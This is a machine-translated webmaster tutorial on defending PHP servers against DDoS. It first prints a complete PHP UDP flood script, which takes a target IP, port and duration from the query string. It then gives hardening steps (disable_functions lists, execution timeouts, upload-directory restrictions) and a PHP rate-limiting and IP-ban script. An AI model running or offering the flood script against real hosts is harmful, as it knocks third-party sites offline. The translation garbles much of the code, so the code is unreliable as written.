A detailed explanation of several defense methods of PHP DDoS

Let's look at the PHP DDoS code first.

The code is as follows

Copy Code

$packets = 0; $ip = $_get[' IP ']; $rand = $_get[' Port ']; Set_time_limit (0); Ignore_user_abort (FALSE); $exec _time = $_get[' time ']; $time = time (); Print "flooded: $ip on port $rand "; $max _time = $time + $exec _time; For ($i =0 $i <65535; $i + +) { $out. = "X"; } while (1) { $packets + +; if (Time () > $max _time) { Break } $fp = fsockopen("udp://$ip", $rand, $errno, $ERRSTR, 5); if ($fp) { Fwrite ($fp, $out); Fclose ($FP); } } echo "Packet complete at". Time (' h:i:s '). "With $packets (". Round (($packets *65)/1024, 2). "MB) packets averaging". Round ($packets/$exec _time, 2). "PACKETS/S n"; ?>

Careful friends will find that Fsockopen is a major attack function, the constant connection to send requests resulting in machine traffic and excessive CPU so that the site is not normal access.

So a simple study of the PHP DDoS script construction, and some gains, the following describes some of the best way to avoid:

Note: The following operations are dangerous, for any consequences, and not with Pride Tour, please operate carefully.

1. Open php.ini

2. Disabling dangerous functions

Because the program is different, the function requirements are different, so ask the customer to delete the need to disable the function.

Find Disable_functions, will precede the ";" To remove, to increase after an equal sign:

The code is as follows	Copy Code
Phpinfo,passthru,exec,system,popen,chroot,escapeshellcmd,escapeshellarg,shell_exec,proc_open, Proc_get_status,fsocket,fsockopen

3. Set the PHP execution timeout time

If the program has not finished executing but has reached the maximum execution time, it will be forced to stop, please adjust the time as needed.

Find Max_execution_time, will precede the ";" Remove, add a positive integer after the equal sign, in seconds, such as: 30

4. Disable upload directory PHP execute permissions

Probably divided into three kinds of servers: Iis,apache, Nginx, the specific steps will not be written, release a link for everyone to refer to:

IIS and Apache canceling directory Script execution permissions method: Http://www.111cn.net/sys/Windows/46232.htm

5. A Very violent approach

Directly prohibit PHP execution, because many sites can generate static Web pages, each generation or management to manually open PHP Execute permissions, now has a few users to use this method, the specific method see method 4

6. Close User Center

For example, Dede and other CMS will have User Center, there are a lot of places to upload, this is probably the problem.

7. Modify the Admin directory

This method is not in detail, not for all programs.

8. Modify Default Admin Account

Many people are accustomed to using: admin But if the program is vulnerable, it is easy to guess the password of the admin, so we recommend that the admin to modify the other login name.

9. A complex and remembered password

Whether it's a windows/linux system user or a webmaster's account, you need to set up a password that's hard to guess, such as: 123hai@tang@.

And then attach a PHP anti-DDoS attack code

The code is as follows

Copy Code

<?php Query prohibits IP $ip =$_server[' remote_addr ']; $fileht = ". Htaccess2"; if (!file_exists ($fileht)) file_put_contents ($fileht, ""); $filehtarr = @file ($fileht); if (In_array ($ip.) RN ", $filehtarr)) Die (" Warning: ".) <br> "." Your IP address are forbided by some reason, IF you have any question Pls Emill to shop@mydalle.com! "); Add Prohibit IP $time =time (); $fileforbid = "Log/forbidchk.dat"; if (file_exists ($fileforbid)) {if ($time-filemtime ($fileforbid) >60) unlink ($fileforbid); else{ $fileforbidarr = @file ($fileforbid); if ($ip ==substr ($fileforbidarr [0],0,strlen ($IP)) { if ($time-substr ($fileforbidarr [1],0,strlen ($time)) >600) unlink ($fileforbid); ElseIf ($fileforbidarr [2]>600) {file_put_contents ($fileht, $ip.) RN ", file_append); unlink ($fileforbid);} else{$fileforbidarr [2]++;file_put_contents ($fileforbid, $fileforbidarr);} } } } Anti-Refresh $str = ""; $file = "Log/ipdate.dat"; if (!file_exists ("Log") &&!is_dir ("Log")) mkdir ("Log", 0777); if (!file_exists ($file)) file_put_contents ($file, ""); $allowTime = 120;//anti-refresh Time $allowNum =10;//anti-refresh times $uri =$_server[' Request_uri ']; $checkip =md5 ($IP); $checkuri =md5 ($uri); $yesno =true; $ipdate = @file ($file); foreach ($ipdate as $k => $v) {$iptem =substr ($v, 0,32); $uritem =substr ($v, 32,32); $timetem =substr ($v, 64,10); $numtem =substr ($v, 74); if ($time-$timetem < $allowTime) { if ($iptem!= $checkip) $str. = $v; else{ $yesno =false; if ($uritem!= $checkuri) $str. = $iptem. $checkuri. $time. " 1rn "; ElseIf ($numtem < $allowNum) $str. = $iptem. $uritem. $timetem. ($numtem + 1). " RN "; Else { if (!file_exists ($fileforbid)) {$addforbidarr =array ($ip.) RN ", Time ()." RN ", 1); File_put_contents ($fileforbid, $addforbidarr);} File_put_contents ("Log/forbided_ip.log", $ip.) -". Date (" Y-m-d h:i:s ", Time ())." --". $uri." RN ", file_append); $timepass = $timetem + $allowTime-$time; Die ("Warning:".) <br> "." Sorry,you are forbided by refreshing frequently a much more, Pls wait for ". $timepass." Too to Seconds "); } } } } if ($yesno) $str. = $checkip. $checkuri. $time. " 1rn "; File_put_contents ($file, $STR); ?>

Related tutorials:

IIS prevents PHP DDoS from completing network bandwidth and server resource resolution